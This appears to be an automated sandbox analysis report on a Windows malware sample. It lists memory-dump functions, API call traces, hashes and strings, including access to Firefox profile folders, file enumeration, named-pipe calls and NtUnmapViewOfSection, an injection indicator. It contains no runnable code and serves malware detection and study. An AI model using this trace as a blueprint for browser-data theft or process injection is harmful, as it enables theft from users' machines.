    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
